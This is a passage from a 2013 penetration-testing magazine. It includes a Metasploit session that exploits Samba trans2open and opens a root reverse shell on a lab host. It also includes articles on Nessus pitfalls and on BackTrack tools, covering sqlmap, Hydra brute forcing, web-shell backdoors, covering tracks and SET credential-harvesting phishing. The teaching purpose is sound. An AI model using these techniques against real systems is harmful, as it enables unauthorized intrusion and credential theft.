manual/bashref.html
[9] nmap – http://nmap.org/
[10] OpenVAS – http://www.openvas.org/
[11] Wireshark – http://www.wireshark.org/
[12] CVEDetails, samba related search results – http://www.cvedetails.com/vulnerability-list/vendor_id-102/product_id-171/
version_id-9501/Samba-Samba-2.2.1a.html
[13] Metasploit framework – http://www.metasploit.com/

Listing 7. metasploit session output
$ msfconsole
=[ metasploit v4.6.0-dev [core:4.6 api:1.0]
+ -- --=[ 1045 exploits - 589 auxiliary - 174 post
+ -- --=[ 274 payloads - 28 encoders - 8 nops
msf > use exploit/linux/samba/trans2open
msf exploit(trans2open) > show options
Module options (exploit/linux/samba/trans2open):
Name
---RHOST
RPORT

Current Setting
--------------139

Required
-------yes
yes

Description
----------The target address
The target port

Exploit target:
Id
-0

Name
---Samba 2.2.x - Bruteforce

msf exploit(trans2open) > set RHOST 192.168.1.105
RHOST => 192.168.1.105
msf exploit(trans2open) > exploit
[*] Started reverse handler on 192.168.1.107:4444
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
[*] Trying return address 0xbffffbfc...
[*] Trying return address 0xbffffafc...
[*] Command shell session 1 opened (192.168.1.107:4444
-> 192.168.1.105:32862) at 2013-04-24 05:56:25 +0200
id
uid=0(root) gid=0(root) groups=99(nobody)

StartKit 01/2013(01)

Page 18

mands to obtain a remote privileged access on the target system. Listing 7 shows
the metasploit session output.
During a rveal penetration test you
should verify whether all the vulnerabilities identified are exploitable or not.
It's not sufficient to stop the penetration
test on the first identified vulnerability. If
the presented scenario was a real one, I
should have also tested possible vulnerabilities affecting http, ssh and all other
identified services. Moreover, once you
"breach" the security measures it is time
to identify the relations between the vulnerable system and other systems interacting with it.

Conclusion

What I tried to show you in this article is
that, in order to become a professional
penetration tester, you need to understand how to work to meet business and
industry needs. This article quickly covers
techniques and methodologies that are
the subject of whole books, however my
goal with this is not trying to be exhaustive
but to be a starting point to approach penetration testing as a profession.

Francesco Perna

Computer enthusiast since childhood, has
spent more than 15 years on the research of
security issues related to applications and
communication protocols, both from the offensive and defensive point of view. He is a
partner and technical director of Quantum
Leap s.r.l., a company that offers security
services to companies and organizations.
http://www.linkedin.com/in/francescoperna
[email protected], www.quantumleap.it
http://pentestmag.com

Cyber attacks are on the rise.

So, you think your systems
and networks are secure?
Think again – you’ve already been attacked and compromised.
And, we should know because we did it in less than four hours. Here’s the good news:
we’re the good guys. We can tell you what we did and how we did it, so you’ll be
prepared when the bad guys try it – and they will. We’ll show you how.

4 Combat cyber attacks

4 Ensure resilience

4 Mitigate risk

4 Improve operational efficiency

Visit www.KnowledgeCG.com to learn how KCG’s experienced, certified cybersecurity
professionals help our government and commercial customers protect their
cybersecurity programs by knowing the threat from the inside out.

Trusted Cyber Advisor

PENTESTING WITH TOOLS

Penetration Testing
with Nessus
The Continual Need for Trained Pentesters
In the last 10 years, cybersecurity has become a household word,
and due to the growth of critical infrastructure and an exponential
increase in the related threat of cyber-attack, dominates every
conversation we have about securing this critical infrastructure.

T

his has resulted in increased customer demand for services; a growing market for cybersecurity vendor products; and an expansion within higher education curriculums, including
advanced degrees and certification programs within the cybersecurity field.
The president of the United States has declared
that the “cyber threat is one of the most serious economic and national security challenges we face as a
nation”, and that “America's economic prosperity in
the 21st century will depend on cybersecurity”. This
emphasis has significantly expanded investment in
cybersecurity, illustrated by the 2013 allocation of
$769 million to the Department of Homeland Security for its cybersecurity initiatives and the request by
the Department of Defense for $3.2 billion by 2015.
These expenditures on cybersecurity are part of a
projected $65.5 billion to be spent by the federal
government between 2013 and 2018.
Playing a critical role in this clearly growing industry is that of the penetration tester, also known
as a pentester.
The pentester is an individual constantly staying
abreast of the newest exploits, security flaws, and
tricks-of-the-trade. This role has created a specialized niche within the cybersecurity realm and has
become a vital part of any security program and
security assessment.
StartKit 01/2013(01)

According to the SANS Institute, penetration
testing is ranked as the second “coolest” job in
the industry. This enthusiasm has created a much
larger mainstream market flooded with tools for
the aspiring penetration tester. There are a significant number of both free and commercial penetration testing tools available on the market. The
most popular of these tools and the most widely used by penetration testers of every skill level
is the automated vulnerability scanner. There is
a common misconception that penetration testing is simply running an automated vulnerability
scanner and all the important vulnerabilities will
be magically highlighted for the tester as a result.
After that, it's a simple matter of determining the
false positives and exploiting the ones that are
valid. To better examine this theory, we will take a
look at one of the most popular vulnerability scanners currently in use today, Nessus® (Tenable
Network Security, Inc.).

Nessus Vulnerability Scanner

Nessus, a vulnerability scanner created by Tenable Network Security, exists primarily as either
a free, non-commercial version for home use or a
professional version (with paid licenses for each
system it is used on). Version 5, the most recent
version of Nessus, and version 4 are built on a

Page 20

http://pentestmag.com

server-client model, taking a built-in (and continually updated) series of more than 50,000 plug-ins
(vulnerability and configuration checks) to determine any existing vulnerabilities or issues on a
set of specified targets and ports. It makes use of
an HTML5 web interface for the client piece that
allows easy configuration of the scan and can be
used with the same functionality on Linux® (Linus
Torvalds), Windows® (Microsoft Corporation),
OSX® (Apple Inc.), and mobile platforms. The
server component runs the test and performs the
actual vulnerability scan. It flags the high-risk findings with an ominous red color, moderate risk issues with a cautionary orange, and the most common low-risk occurrences with a muted blue color
(considered informational).
Each finding will not only have a rating and a fully
detailed description of the issue, but the tester can
also even check to see if an associated exploit exists, a corresponding common vulnerabilities and
exposures (CVE) identifier and BugTraq number, if
one exists, for the tester to read further about the
potential exploit. Nessus will go even further and
point out an exploit framework to use (Metasploit®
(Rapid7 LLC), Core Impact® (Core SDI, Inc.), Immunity CANVAS™ (Immunity, Inc.), etc.) if there is
one with a known workable exploit. Given this startling wealth of automated analysis and reporting
provided to the aspiring cybersecurity professional, one could be led to think that the profession has

become more of a point-and-click exercise to fill
one more box on a security assessment checklist.
At the end of the day, the tester will have run
Nessus, used all the identified exploits that were
highlighted; employed all the default and null passwords that were provided to access a wide variety of services and devices; and even examined
the wealth of additional enumerated data that was
outlined by the detailed report, complete with color
priority codes, custom filters, and logically grouped
targets by IP address. At the conclusion of testing,
the tester wraps up, unplugging from the network,
and leaves confident, knowing that a thorough
penetration test was conducted. The customer
feels reassured by knowing that, at a minimum, all
the important high-level threats have been identified and no systems were harmed in the making of
this pentest. But that may not be the case...
What could have possibly have been missed?
Let’s take a walk back through the above case and
see where things could possibly have been overlooked or gone askew.

Common Mistakes

Pre-game: Network mapping

Prior to running the Nessus tool, a penetration tester has to first determine the target list that will be
fed into the tool. What IP addresses are we scanning? Let's assume we ran the basic host discovery scan. Did we account for firewalls? Many starting testers will run a network discovery scan once
and faithfully record the IP addresses that were
discovered. Did we accurately identify the operating system (OS) in the hopes of reducing the number of plug-ins run during the vulnerability scanning phase?
Ideally, testers will use a network mapping tool
(Fyodor's Nmap and variants are a popular choice)
to better define the target space. Were all 65,535
ports examined? By default, Nmap does not scan
every port. On one particular engagement, a highlevel port (not found in the basic Nmap scan) contained a running Bean Shell. Bean Shell is an environment with dynamically interpreted Java®
(Oracle America, Inc.) and scripting capability with
powerful features, including a remotely accessible
shell for debugging (or printing password hashes
from the server it is running on; Figure 1).

Main Event: Running Nessus
Figure 1. Redacted image of displaying the contents of a
shadow file with cat via Bean Shell’s exec command
StartKit 01/2013(01)

Rookie mistake? Maybe it would be easier to just
skip any preliminary steps and use Nessus's builtin Transmission Control Protocol (TCP) scanner
Page 21

http://pentestmag.com

PENTESTING WITH TOOLS
instead? Problem averted! Let's take a moment
and see what else could go wrong.
Is your host-based firewall up? That could greatly interfere with the validity of your scan, even resulting in the loss of some of the probes intended
for your target. Are you using a virtual machine
(VM) and running more than one operating system at once? Are you using a Network Address
Translation (NAT) configuration because the customer only had one usable IP address for you?
Nessus as far back as Version 2 had known issues when it is run on a VM in NAT mode, even
creating false negatives in some cases, causing
vulnerabilities to be overlooked. Nessus clearly
documents potential issues and has addressed
many in later versions, but many beginning security analysts may consider Nessus to be relatively simple and overlook the importance of reading
through the guide.
At this point, the tester may think, "We can have
the best of both worlds" and run Nmap functionality straight from Nessus. Nessus is configured to
run each plug-in against one host. A special plugin is used to call Nmap functionality. If 20 hosts are
scanned at once, 20 instances of Nmap will be run,
one against each host. This can quickly become a
resource nightmare.
One last consideration that can concern customers is whether safe checks are employed. Denial
of service is one of those situations that no penetration tester wants to ever experience on a customer site or the associated repercussions for it
occurring due to negligence, which can be severe.

After Party: Reading Through Nessus Results

Assuming the previous steps were followed, the
tester has hopefully managed to avoid all of the pitfalls of setting up and running the Nessus scanner.
However there's more to take into consideration. In
a typical scenario, you have dutifully identified all
the high-risk findings and some of the more interesting medium-risk findings, but you are on a tight
schedule and focused on additional important priorities. However, there remains hundreds of lowrisk findings and "less interesting" medium-risk
findings that may have been ignored in the interest of time.
There are names of potentially open file shares
that are listed faithfully by Nessus, but generally do
not come with a screaming red SECURITY HOLE
attached to herald its existence. This is when it becomes vitally important to make the effort of avoiding the common tendency of thinking just because it
StartKit 01/2013(01)

has low risk or "no risk" associated with the finding,
that it's worthless. Developers tend to be pressed
on schedule, which results in the casual saving of
files wherever it is quick and convenient to access
them. Development teams may create temporary
shares to more easily run tests and access other
teammates’ scripts. What’s that? The labor-saving
script that’s sitting on the share has admin credentials? This not only saves the developer time and
energy, but also the busy pentester (Figure 2).
A host can potentially have a startling large number of shares open to the public (including the
dreaded C$ and Admin$) and still be listed as a
risk factor of „none” (Figure 3).
Nessus also identifies many directory traversal
issues as a low- or medium-risk finding (though it
marks a number of others as high, depending on
the plug-in).

Figure 2. Redacted configuration file with perl script settings,
and database credentials accessible via unauthenticated web
access

Figure 3. A list of open server message block (SMB) shares
identified by Nessus

Page 22

http://pentestmag.com

With directory traversal, one can pull configuration files, logs, /etc/password files (useful for determining user names) and a wealth of data from
a target.
Maybe those lower, less flashy findings aren’t so
unimportant after all.
Even the more attractive findings produced
by Nessus can result in overlooked issues. You
look up the finding suggested by Nessus, and
you realize you are running the suggested exploit framework with all the most current plugins.
You triumphantly load up the exploit, set your
payload, and fire away. However, there is a mental checklist of questions you should have asked
yourself beforehand, even when dealing with
low-risk exploits.
Did you check off of which port it was running?
• Is it possible a firewall is blocking the return
port selected (e.g., default 4444 on Metasploit),
and you record the system as being
"patched?"
• In haste, did you check the info data to see if a
DoS was possible with the exploit we are running due to the version of OS running on the
target system?

Conclusion

The questions and concerns that have been addressed throughout this article are not profound
secrets to the Art of Penetration Testing. However, leaving such issues unaddressed results in
many of the common mistakes for which novice
and even some more experienced pentesters are
known. Common mistakes happen for a large variety of reasons. Testers who do not have the experience and training that is necessary and may
tend to develop an overreliance on automated
tools and accept on blind faith the settings configured out of the box and the data that results
from them. Starting testers become so obsessed
by the “high-risk” findings (much like a shiny, red,
blinking button) that they tend to turn their noses
at the often-overlooked, lower-risk findings.
What many do not stop to realize is that developers and companies are running the same
automated tools that pentesters use. Patching
and protecting against remote exploits have increased. Vendors incorporate the newest safeguards into their software. Unless the customer is tragically bereft of any security know-how,
odds are they not only run the same automated
StartKit 01/2013(01)

tools and scanners you do, but they also have
even more expensive shiny tools that create better-looking reports. The true value of pentesters,
which makes the profession continually stand
apart in the cybersecurity industry, is their knowing how to properly use the tools that are available to them and an ability to manually analyze
the security environment to see, in many cases,
the gaps in security.
A pentester is able to look at custom, homegrown
application code that does not have a published
advisory and still thoroughly see the security issues in its entirety. Pentesters observe the application filters, security permissions, and firewall rules
that often baffle automated tools and find ways
around them. Much like a martial artist who learns
how to punch, kick, and block will still take years of
practicing and training before gaining a true level
of proficiency, a pentester can learn the a stepwise
methodology, the syntax of a myriad of tools, and
have bookmarks to every major security advisory
site. It may still take years turning the learning of a
craft into an art form.

How to Become a More Proficient
Penetration Tester

Despite the numerous considerations to take into
account while testing, Nessus and other security
tools still remain highly useful. They are meant to
enhance or better facilitate a penetration test, but
are not used in place of one. There are some basic
principles that should be constantly in the mind of
every penetration tester.

Learn the Tools

Nessus alone has a wealth of other features (mobile device examination, payment card industry
(PCI) compliance, credentialed policy scans, and
even the ability to create custom Nessus® Attack
Scripting Language (Tenable Network Security,
Inc.) plug-ins) that cannot possibly be covered
in a short article. It has a user-friendly interface
and intuitive policy creation options. This does
not remove the need to learn what flaws or issues the tool may have (every tool has them) or
situations where another tool may be more useful. If one tool did it all, there would not be such
a huge market of penetration testing tools. Experimenting at home or within a test lab to learn
the quirks of any tool is highly advisable. Make
notes of what works well and strange behavior
so that others on your team do not have to learn
the hard way.

Page 23

http://pentestmag.com

PENTESTING WITH TOOLS
Understand the Networking

Many of the issues described dealt more with the
configuration of your testing computer, the configuration of VMware® (VMware, Inc.), and the configuration of the customer›s network perimeter. To
use a network testing tool, knowledge of the network becomes vital. If Nessus or any other tools
seem to be behaving oddly, start a network sniffer (e.g., Wireshark® (Wireshark Foundation, Inc.)
and see what the activity looks like. Are the connections being made appropriately? Where in the
process did things break down? If the tester does
not realize what is going on «under the hood, «he
or she may never realize what exactly is causing
issues in the test.

Keep the Goal in Mind

It is important to keep the goal of your test in mind
(control the network, going after sensitive celebrity accounts, or preventing the system from declaring thermonuclear war). It differs from customer to
customer. Do they want a simple compliance scan
so they can point and say they remediated all the
"high-risk" findings? If the customer really wants
to know that their information is safe, it will help
for the tester to take the time to learn what they
most want to protect. Hunting after high-risk findings can be pointless if they were all on a development box that is on its own, segregated subnet,
unreachable by the rest of the network that will be
turned off next week. An open share that happens
to reside on a development version of the main
database server ultimately allows one to not only
compromise the database, but also the underlying
OS. This could easily lead to captured password
hashes and the compromise of several other servers on the network.

Learn the Customer

Each new test is a new experience; see how a particular network is deployed. Learn the standard
procedures for each particular client. Many organizations have their own naming and coding conventions for their applications. Developers share
source code. Password naming conventions by
the help desk seem to follow the same patterns.
Customize the test to fit the current target site.

Be Creative

Penetration testing largely involves thinking "outside the box." A tester is learning a series of rules
and configurations and then obligingly getting
around them. Each new security measure and verStartKit 01/2013(01)

References

• "Cybersecurity | The White House." Web. 25 Mar.
2013. http://www.whitehouse.gov/cybersecurity
• Brownstein, Ronald. "Pentagon Seeks $3.2 Billion
for Revised Cyber Budget – NationalJournal.com."
NationalJournal.com. Web. 25 Mar. 2013. http://
www.nationaljournal.com/tech/pentagon-seeks3-2-billion-for-revised-cyber-budget-20110325.

sion of software means a new puzzle to unlock.
Learn from experience, share techniques, observe
forums, setup your own network and try out new
things.
Nessus has shown itself to be a versatile, powerful, and highly useful tool for the penetration tester.
However, like any of the other hundreds of existing
security tools, it does not in any way replace the
penetration tester. Instead, it helps make the process of testing smoother, faster, and often easier
so that the penetration tester is better able to do
the job.

Dan Robel, CISSP, GCIH, GPEN

Dan Robel is a senior cyber penetration testing specialist at SAIC. With over 10 years of information security experience, he serves as a penetration test team lead
and a course instructor for SAIC within the Washington,
D.C. area. He has guest lectured on cyber warfare at the
Air Force Institute of Technology. Robel offers his penetration test expertise as a “red team” member for SAIC’s
CyberNEXS, a patented cybersecurity training and exercise platform, during the Air Force Association’s CyberPatriot national high school cyber defense competition and the Maryland Cyber Challenge. Robel earned
a Bachelor of Science in business and computer science
from Mount Saint Mary’s and a Master of Science in
knowledge and information management with a concentration in information security from George Washington University. His master’s thesis "International CyberCrime Treaty" was adapted as an honors white paper
for the SANS Institute.

Page 24

http://pentestmag.com

PENTESTING WITH TOOLS

BackTrack for
Pentesting?
There is always a major struggle between the open source camp
and the proprietary developed tool camp when it comes to the
value of software and the impact and usability it has. And when
it comes to security and testing software, these arguments are
repeated over and over again.

T

he fact however remains that the guys and
girls that seek to penetrate your network are
not picky. That can put them at an advantage when it comes to the vectors of attack they
identify. If you or your company looks at a specific
philosophy when it comes to security, it is almost
certain that the hacking world in general will also
look at other exploits and methods of exploiting.
For this, Einstein is to be taken literally on his word
when he said, “If you invent something that is foolproof, the world will invent a better fool”.
When it comes to open source tools, the internet
is riddled with solutions for each and every thing
you might want. And because of the nature of social and community developed software, the minds
it sometimes attracts are the brightest the world
has to offer. Thus, the quality of tool you can find is
nothing short of “bleeding edge” and is usually the
first when it comes to new ideas and philosophies.
But as with the bulk of open source tools you can
find, the developer focus is the core of the problem,
and the fringe lying modules receive little, if any, attention. This makes open source tools notoriously
difficult to configure and get to perform “as advertised”. Everything is possible for those selected few
with the inherit knowledge and skill to tinker. And
even if there is a large community behind these
tools, It is difficult for these tools to be deployed
StartKit 01/2013(01)

for business use outside of realm of tinkering. The
type of person entering into the world of pentesting
is usually such a person. He/she/they know their
way around computers and compiling source from
scratch to get a tool to work is not such a mountain
to climb for the regular user. But even this class
of individual is more than likely appointed on contract, it is sometimes not worth spending the time
and effort to get something worth while configured.
Especially if you need to earn your way in life, and
each hour spent on something that should be trivial (like installing a small piece of software) becomes a chore.
Enter the good folks at project that produces
tools like BackTrack. The guys and girls of the
BackTrack community spend their time on getting
all the most important tools, getting it running in
“ready to use”/”out of the box” solution. No longer
does it take forever to hunt down the correct tool
and get it to run in whatever environment you have
already running. The task has become as easy as
downloading the image, and running it from either
a virtual space, live from a USB stick or boot from
the DVD. All the key tools are there. All you need
to do is find the tool that suites your needs, and
learn how to use it. And in most cases, there is
more than one almost similar tool configured inside backtrack, for your convenience.

Page 26

http://pentestmag.com

Even though the purists among us will still prefer to configure and maintain their own implementation of the selected tools, BackTrack makes it
easy to get started, and should not in any way be
seen as sub par to bit for bit compiled and file for
file configured tools. Far from it! The mindset of
the hacker is not how pure your configuration is,
or who did the best job of configuring the tool that
will allow for the exploit of a system. As long as the
goal is achieved, the tool was worth using. And the
core focus of a professional pentester is to put him/
herself in the same mind as a hacker, and find the
vulnerabilities in servers and systems before anyone else does.
With the tool in hand, and the base understanding of what is required to be found, you can now
set forth and start your testing on system and applications.
Ethics plays a large roll to distinguish between
hacker and pentester. The difference is not in skill,
but in the way access to systems is disclosed. A
hacker will do this as a sport; a cracker will do it
for self gain (the two descriptions are different, but
usually used interchangeably by the media and
Hollywood), where as a pentester will do all this
above board, getting the permission of the company or person the test is done against before starting the process of information gathering and exploitation. And then also, at the end of it all, the
pentester will disclose all exploits found, putting
the focus squarely on assistance in the rectification of security issues, rather than maintaining access to these systems for future and personal use.
It can be seen as a moral gray area, but trust and
an internal ethical drive has to govern the pentester to do what is right. In short, pentesters as seen
as white hat hackers with a piece of paper allowing
them to hack.
If you don't know this already, hacking is quantified in 5 stages when it comes to the education
of pentesters. These stages are: (1) information
gathering, (2) system scanning, (3) gaining access
to a system, (4) maintaining access to the exploited system, and (5) covering your tracks ensuring
your actions go unnoticed. For each of these stages, BackTrack has a set of tools assisting you in
getting the correct information to reach your goal.
Information gathering: Because cracking passwords and finding back doors into systems is a
time consuming and sometimes impossible task,
life for a hacker becomes much easier if he/she
knows how a system works, and even more so if
user-names and passwords are known. GatherStartKit 01/2013(01)

ing information like this (and sometimes striking
gold in the sense of user-names and passwords)
is what social engineering is all about. Rather work
smart than too hard.
BackTrack is a fully functional operating system
with web browsers included. No need to search
Google from your primary OS, and then having to
write your notes before starting BackTrack, you
can do all the work from this environment.
For gathering technical information, BackTrack's
Firefox browser has a number of tools installed
to allow you to find information on the pages you
browse. Scripts will be shown and you will be notified if something odd is used on the website you
are looking at before you even start scanning.
As a further step BackTrack allows you to browse
the site through a security proxy, which will passively investigate your target while you browse.
This is ideal for investigating without alarms going
off at the client's side while you are looking at the
site or system in more detail than is initially disclosed.
For this, look into BURP SUITE and OWASPZAP. Both run locally on BackTrack, allowing you
to point your browser to them and browse the sites
you need to investigate. On the application interface, you will find more information than you would
ever believe is possible.
Scanning the system: The first technical step in
hacking is to scan the target machine(s) to understand where the "attack" can be launched. Having
a list of open ports will give you an idea of services
that are running. Corporates will very seldom run
services on weird ports because of standardization
and, in most cases, compatibility between different
servers and systems.
The tool of choice here is NMAP. It is also seen
as the industry standard, and a large number of
tools, open source and proprietary, uses it as base
to find the initial information on a system before
making the decision further of which vector or attack to try and exploit. NMAP in an active scanning
tool, and if not used wisely will alert knowledgeable
network and system administrators of your actions.
NMAP comes in many flavours and even a number of graphical user interfaces. The most common of these is ZENMAP as installed on BackTrack. The features are the same, but are easy to
access without learning command line parameters
for each of the features.
Deciding which vectors of attack will be used,
NMAP (or its derivatives) will show you the open
ports on the system. Each of these ports is a po-

Page 27

http://pentestmag.com

PENTESTING WITH TOOLS
tential vector of attack. And for each of the tools/
services running on these ports, BackTrack has a
tool to exploit or investigate further.
The primary focus however for the pentester will
be the website or web system running on the server.
And depending on the mandate, the focus for information scanning will be on port 80, 443 and 8080;
the default open ports for web servers to run on.
Tools such as the Harvester are used as to check
social media sites like linkedin and search engines
for any email accounts linked to the domain you are
trying to access. Results can be refined by putting
result limits on the scan. A similar tool on Backtrack
is websecurify the results will inform you of server versions that are being displayed. Removing the
version numbers from being displayed will assist
you in hardening the server against scans for versions by possible attackers (Figure 1 and Figure 2).
Another popular tool is the Joomscan tool that
checks a web-server for the version of joomla installed and the various vulnerabilities associated
with the plug-ins and modules installed on the website. The results are categorised into low,medium
and high risk problems. Joomscan allows you to
quickly identify the key problems in the site.

A vast majority of the attacks on domains however occur via sql injection on the website. BackTrack comes installed with Sqlmap, Scans done
with sqlmap can bet refined to scan of an operating
system version with the –os=linux modifier as well
as set to scan for a specific type of database such

Figure 3. Joomscan with Scan options

Figure 1. Websecurify Web-testing tool

Figure 2. Websecurify scan log output
StartKit 01/2013(01)

Figure 4. Sqlmap tool scan options
Page 28

http://pentestmag.com

as MYSQL, SQL etc with the –dbms=MYSQL modifier
on your scan, the level of the scan can be set to
run a more intense scan on the account if the initial scan does not reveal any errors (Figure 4 and
Figure 5).
For every piece of software introduced to a system, bad code can open up the system for exploit.
Web applications and websites is not exception.
They are the primary focus for hackers because
they are the most visible, and usually the part introduced on a server (be it Windows, Linux or any
other UNIX environment) that are not tested for all
eventualities before it goes live.
Web testing is made easy with BackTrack. An industry standard tool included is W3AF (Web Application Attack and Audit Framework). This is not only
a command line tool, but has a graphical interface
as well making the use of the system easy. The results are given in report format as well as usable
interface form allowing the knowable to do exploits
directly from the GUI (Figure 6 and Figure 7).
Additional tools already included in BackTrack is
WPSCAN and JOOMSCAN that is build specifical-

Figure 5. Sqlmap example scan query

Figure 6. W3af graphical user interface startup screen

Figure 7. W3af OWASP_TOP10 Scan against domain.com
StartKit 01/2013(01)

ly for the world 2 most used content management
systems: Word Press and Joomla!.
Identifying these systems and then running a
scan is very easy using these tools. And because
of the expand-ability of both these systems, old
versions can be seen as very unsecure resulting in
easy exploitable vulnerabilities.
Exploiting the system to gain access: The sport
in hacking is to gain access to a system that you
target. All the information you have gathered will
assist you in achieving this ultimate goal. Sometimes it is as easy as using a found user-name and
password, and from there exploring and seeing if
you can escalate yourself to the highest level of
rights on a system. Sometimes none of the information you gathered is valid, and then it becomes
a technical game to see the hack through.
Access to a system can result in a number of
things that can be done. Defacing a website to
make a political statement (in the realm of cracking) or leaving a hidden note for other hackers to
find (the sport of hacking) may seem like the ultimate, but it is only the most visible of Internet penetration and hacking. Hidden away from the public
eye (databases or data capsulated in confidential
files) is where the elite hacker plays.
For this, the best-known automated tool is
METASPLOIT. This tool is installed and ready to
be used in BackTrack. BackTrack also includes
a graphical interface to METASPLOIT called ARMATIGE. Yet again, the command line options are
represented via a mouse click interface, and make
the multi scan of multi hosts easier than the time
consuming typing of each host into the interface.
This, however, is still available for those pesky exploits that need fine tuning.
METASPLOIT is a compilation of tools and scripts
(especially scripts) for known exploits for different
sets of tools running on servers. This span to all
commonly used operating systems used as servers, and even exploits for desktop class operating
systems.
The advantage of using METASPLOIT is that exploitation does not stay theory. If it can exploit vulnerability, it will, and you get presented with the
terminal to further your hack.
METASPLOIT is not the only exploitation tool
included in BackTrack. For a number of specific
tools, there are specific exploits targeting those
systems only. CISCO is a major target with the
CISCO-GLOBAL-EXPLOITER already installed
and configured on BackTrack. As is MySQL, MSSQL and ORACLE tools. But for a pentester, the

Page 29

http://pentestmag.com

PENTESTING WITH TOOLS
most important will be the SQLMAP tool, allowing easy exploit of SQL injection points found by
W3AF, WPSCAN and JOOMSCAN.
Another angle of attack on web system or servers
is to do an all to well-publicized brute force attack.
For this, tools like HYDRA and its graphical interface, HYDRA-GTK exists (Figure 8 and Figure 9).
The art of brute force attacks is firstly in the user-names you have harvested in the first stage of

Figure 8. Hydra-GTK target settings

Figure 9. Hydra-GTK username and password setup
StartKit 01/2013(01)

your attacks. Not knowing what user-name to use
is just so crippling as not having the password. A
successful brute force usually results in a username and password combination, and is not just
a focus on one of the two. If you can take one of
these out of the equation, time needed for the attack can be halved. Thus, find the way user-names
are assigned if you can. Is it only first names, or is
it last name and then first letter for fist name? Or
is it an email address? What of these did you get
while you gathered information?
Passwords and the user of passwords is an art
all on it's own. With the focus so squarely put on
password strength by social networks, everyone is
getting use to using password that is not simply a
dictionary password.
This however makes life difficult, but not completely useless to try. Take a look at tools like JACK
THE RIPPER as it is installed on BackTrack. For a
good dictionary, scour Google for a word list in the
language the site is in you are targeting.
Maintaining access: Usually before this phase, a
pentester's work is done. The task was to find exploitable holes in system and put attention on them
for the client to fix. When you start entering the
realm of maintaining access to an exploited system, ethics has to guide you. This too shall be disclosed to the client. Adding a backdoor script on a
system can allow others to use that for easy exploitation, making you liable.
But, for these backdoor type of access after a
hack, BackTrack supply a number of tools as well.
If you have used METASPLOIT, it can generate a
backdoor type of application for a system allowing
METASPLOIT to find that system every time you
test it.
If the web system or site fell under your hacking charms, BackTrack include a number of web
shells for each of the major used web development
languages. You can upload the selected script via
the exploit you have performed, allowing you to
quickly and easily access the system back-end the
next time you need to without having to go through
the entire process again of the hack. Stored usernames and password can change, but a backdoor
you control into a system is under your control as
long as it is not found and removed by either the
administrator or another hacker.
Covering you tracks: Whenever you access as
system, there are tools to log your actions. Even
if it is just browsing the website, your IP and what
you have requested is logged. This is why passive scanning is ideal when trying to find informa-

Page 30

http://pentestmag.com

tion without arousing suspicion. Active scans can
trigger security notifications when not taking care.
These can range from active protection, which
will block you immediately, stopping your hack attempts in its tracks, to reactive security measures
resulting in legal action and subpoenas being issued for access logs and even seizing your equipment. Thus the importance of obtaining that most
important document giving you the right to test before doing so.
If all else fails, BackTrack include social engineering tools as well. The most used of these is
SET. With this tool, you can make BackTrack act
and look like a legitimate website. An unsuspecting
user must be lured here by any means necessary,
and while not suspecting foul play, will log in, giving you the credentials. The user will then be redirected to the legitimate site, thinking he/she might
have type something wrong.
To do this by hand can take some time. The site
and icon need to be replicated. And then hosted
on a web server. This site will then have to be altered in such a way as to reflect the typed in characters somewhere so you can harvest it. SET allows you to do all this in a few simple steps. It will
pull down the site and replicate it down to a T, and
then update it so that input fields will be harvested
by BackTrack and displayed on the screen. It will

start a web server on BackTrack as well without
the need for you to go through the effort of web
server configuration or page development. And
by simply fooling the targeted people to pass by
your BackTrack's SET web server, you can harvest
the credential you need to further your attempts to
hack the system (Figure 10).
This social engineering method might not be in
the spirit of the pentest, and more in the realm of
pure hacking, but is a method non the less to obtain access to system. It all depends on your mandate as a pentester.
A final note: BackTrack makes it easy for a pentester to get his/her hands on the required tools to
do a good job in finding security exploits on systems. So much so that is also includes pure hacking tools that are outside the realm of testing and
fringing on pure hacking. But it also allows the socalled "script kiddies access to professional tools
that is so easy to use that they can exploit systems
without understanding what has been achieved.
Thus, use BackTrack as a tool to go for pentesting. And use it as the tool to test basics, because
others will. But also see BackTrack as a tool, and
understand what you are looking at when investigating system for security vulnerabilities. It does
put you on the right track. And applying what you
have seen as results out of BackTrack will put you
on the right track to security, or assisting in the security of an environment. BackTrack is vast, and so
is the underlying knowledge that drive the included
tools. And only by exercise and the self-motivation
to learn and understand can it be of value to you
and your client.

Lloyd Wilke

Figure 10. SET Start page with scan types
StartKit 01/2013(01)

Lloyd Wilke is the Director of Webstyles Internet Solutions. He's in charge of Webstyles Client Relations and
Product Support. Lloyd has launched several successful hosting and backup solutions and new client website
penetration testing division. This has provided a platform for our clients to expand their business presence
with minimal cost and get maximum exposure.
Webstyles Internet Solutions which was started in 2007,
Offering web hosting as the main service, this has increased over time to offer online backups and website
pentesting. WebStyles entered into an agreement with
Starship Systems (www.starshipsystems.com) to extend
and complete its security offerings to the market. In addition to security services, WebStyles now also offer the
training and sharing of knowledge on practical business
security.
Page 31

http://pentestmag.com

PENTESTING WITH TOOLS

Network Scanning:
The Basic Tools
Scanning is one of the first steps to obtain information about a
network, services and hosts. While there are numerous tools, most
of them fail to do a complete explanation on what is going “under
the hood”. This article will try to explain the basic techniques used
under the hood of great scanners such as nmap and so forth.

T

his will allow the reader to have not only a
better understanding of how the network
scanners work on the discovery phase, but
also be able to implement their own scanners or
use other programs to gather this information in
the case nmap or other tools would trigger IDS signatures and the engagement requires not being
caught by it (Red Team).

A Good Scan is as Good as Half of the
Penetration on the Machine

You sit down and connect to the network, you get
connected and have access, you smile verifying
that all the tools are updated, get the notes ready,
encrypted directory and fire up the nmap scanner.
The client wants a full detailed report and packet
dump for further analysis by their forensic team, so
you turn on tcpdump and let it record. The client
approaches and the conversation goes like this:
• “So how is the engagement going? Any problems?”
• “No sir, no problem, right now I’m just doing a
network discovery scan”
• “What is that?”
• “I’m just looking for ‘live’ hosts and open ports”
• “… explain to me, what is this program doing?
How does it work?”
StartKit 01/2013(01)

Scanning is one of the first steps enabling to obtain valuable information about the network.
Scanning is the most used and most detected
part of an attack since it gives the attacker vital information, such as: machines that are reachable,
services each machine has turned on or is offering to the reach of the attacker.
Scanning is often underrated and is not really taken care of properly, scanning is an art and
should be taken accordingly, there are basic and
advanced techniques some of which will be covered within this article.
Some introduction into TCP/IP and UDP will be
covered to give background on the techniques
covered.

TCP/IP

The Transfer Control Protocol (or TCP as a short
name) is a transfer protocol (I’m sure the name
gave it away); the name TCP/IP refers to an entire
suit of data communication protocols; the name
comes from adding the Transfer Control Protocol
and the Internet Protocol.
TCP is a connection-oriented protocol. Whenever a packet arrives, it gets checked and an acknowledged packet is send (ACK) to refer to the
particular packet and tells the sender that it arrived. Each packet has a specific number. The ID

Page 32
